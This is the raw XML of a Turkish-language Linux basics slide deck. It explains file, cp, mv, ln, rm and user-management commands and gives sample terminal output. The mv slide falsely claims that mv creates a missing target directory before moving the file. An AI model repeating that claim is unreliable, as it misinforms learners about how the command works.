              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>belge2.png: PNG image data, 800 x 600, 8-bit/color RGB, non-interlaced</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="231" name="Google Shape;231;p32"/>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file belge1.txt belge2.png</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="232" name="Google Shape;232;p32"/>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chemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="❏"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Bir dosyanın türünü (binary, metin, görüntü, ses dosyası, vs.) belirlemek için kullanılır.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="lt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6" name="Shape 236"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="237" name="Google Shape;237;p33"/>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kopyalama komutu: cp</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="238" name="Google Shape;238;p33"/>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total 0</a:t>
            </a:r>
            <a:endParaRPr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drwxr-xr-x 2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4.0K Jan 8 12:00 Desktop/</a:t>
            </a:r>
            <a:endParaRPr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drwxr-xr-x 2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4.0K Jan 8 12:00 Documents/</a:t>
            </a:r>
            <a:endParaRPr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drwxr-xr-x 2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4.0K Jan 8 12:00 Downloads/</a:t>
            </a:r>
            <a:endParaRPr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drwxr-xr-x 2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4.0K Jan 8 12:00 yeni_dizin/</a:t>
            </a:r>
            <a:endParaRPr sz="95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US" sz="950">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>-rw-r--r-- 1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0 Jan 8 12:01 yeni_dosya.txt</a:t>
            </a:r>
            <a:endParaRPr sz="95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US" sz="950">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>-rw-r--r-- 1 john </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="950">
                <a:solidFill>
                  <a:srgbClr val="E9950C"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="950">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> 0 Jan 8 12:10 yeni_dosya2.txt</a:t>
            </a:r>
            <a:endParaRPr sz="950">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="239" name="Google Shape;239;p33"/>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cp yeni_dosya.txt yeni_dosya2.txt</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="240" name="Google Shape;240;p33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4413650" y="1217525"/>
            <a:ext cx="4488600" cy="33516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komut, belirtilen dosyayı veya dizini kopyalar.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Parametreleri:</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-r: Alt dosya ve klasörlerini de kopyalar</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4" name="Shape 244"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="245" name="Google Shape;245;p3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taşıma komutu: mv</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="246" name="Google Shape;246;p34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171450" y="1840175"/>
            <a:ext cx="4115400" cy="2728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200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Desktop  Documents  Downloads  yeni_dizin  yeni_dosya.txt</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="247" name="Google Shape;247;p34"/>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mv dosya.txt ./yeni_dizin/.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="248" name="Google Shape;248;p34"/>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mv komutu, dosyaları taşımak (yer değiştirmek) veya yeniden adlandırmak için kullanılır.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Eğer yeni_dizin dizini zaten mevcut değilse, mv komutu dizini oluşturacak ve ardından dosyayı taşıyacaktır.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="249" name="Google Shape;249;p34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171450" y="12117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ls -alh</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3" name="Shape 253"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="254" name="Google Shape;254;p3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bağlantı komutu: ln</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="255" name="Google Shape;255;p35"/>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500">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>ln dosya.txt /home/user/hard_link</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1500">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="256" name="Google Shape;256;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171450" y="1918075"/>
            <a:ext cx="8730900" cy="28245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 dosya bağlantıları oluşturmak için kullanılır.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İki tür bağlantı oluşturabilir: </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sembolik bağlantılar (symbolic links): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Sembolik bağlantılar, bir dosyaya sembolik bir referans sağlar ve orijinal dosyanın yolunu içerir.</a:t>
            </a:r>
            <a:endParaRPr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sert bağlantılar (hard links): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Aynı dosyaya farklı isimlerle erişim sağlar. Orijinal dosyanın bir kopyası değildir, sadece dosya sistemindeki aynı veri bloklarına bir referans sağlar.</a:t>
            </a:r>
            <a:endParaRPr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Soru:</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komuta hangi durumda ihtiyacımız olur?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1300">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="257" name="Google Shape;257;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171450" y="1280200"/>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500">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>$ ln -s dosya.txt /home/user/dsymbolic_link</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1500">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>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Kaynaklar</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Google Shape;45;p9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="851325"/>
            <a:ext cx="8660700" cy="3717600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Fahmi FJ, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Linux Backdoors and Where to Find Them</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Gus Khawaja, Pluralsight, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Linux Server Hardening in 15 Steps</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>M. Gürol Çay, Linux Sistem Yönetimi</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1" name="Shape 261"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="262" name="Google Shape;262;p3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silme komutu: rm</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="263" name="Google Shape;263;p36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171450" y="1195175"/>
            <a:ext cx="4115400" cy="3373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200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Desktop  Documents  Downloads  yeni_dizin  yeni_dosya.txt</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="264" name="Google Shape;264;p3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rm yeni_dosya2.txt</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="265" name="Google Shape;265;p36"/>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 belirtilen dosyayı veya dizini siler.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Parametreleri:</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-r: Alt klasör ve dosyaları da sil</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-f: Sormadan hepsini sil</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-i: Dosyayı silmeden önce sormak</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komutu yanlış kullanıldığında veri kaybına neden olabilir. Bu yüzden '-i' seçeneği ile kullanılmalıdır.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-i seçeneğini her defasında yazmak zorunda kalmamak için, aşağıdaki komut kullanılabilir:</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alias rm='rm -i'</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1300">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>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9" name="Shape 269"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="270" name="Google Shape;270;p37"/>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Kullanıcı ekleme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> komutu: useradd</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="271" name="Google Shape;271;p37"/>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sudo useradd john</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="272" name="Google Shape;272;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4413650" y="679925"/>
            <a:ext cx="4488600" cy="41007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Linux sistemlerinde yeni bir kullanıcı hesabı oluşturmak için kullanılır. Bu komut, kullanıcının temel bilgilerini ve varsayılan ayarlarını belirleyerek bir kullanıcı hesabı oluşturur.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>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useradd komutu yalnızca kullanıcıyı oluşturur, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>kullanıcının parolasını ayarlamaz</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> veya başka ayarlar yapmaz.</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Parametreleri:</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-m: Kullanıcının ev dizinini oluşturur.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-G: Kullanıcıyı bir veya birden fazla grupa ekler.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 Kullanıcının varsayılan kabukunu belirler.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 Kullanıcının hesap süresini belirler.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="273" name="Google Shape;273;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171450" y="119277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sudo passwd  john</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="274" name="Google Shape;274;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171450" y="17056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sudo </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>userdel</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> john</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="275" name="Google Shape;275;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152275" y="221847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sudo usermod john</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="276" name="Google Shape;276;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2688" l="0" r="0" t="2317"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="155550" y="2731325"/>
            <a:ext cx="4108851" cy="2049300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="277" name="Google Shape;277;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4831050"/>
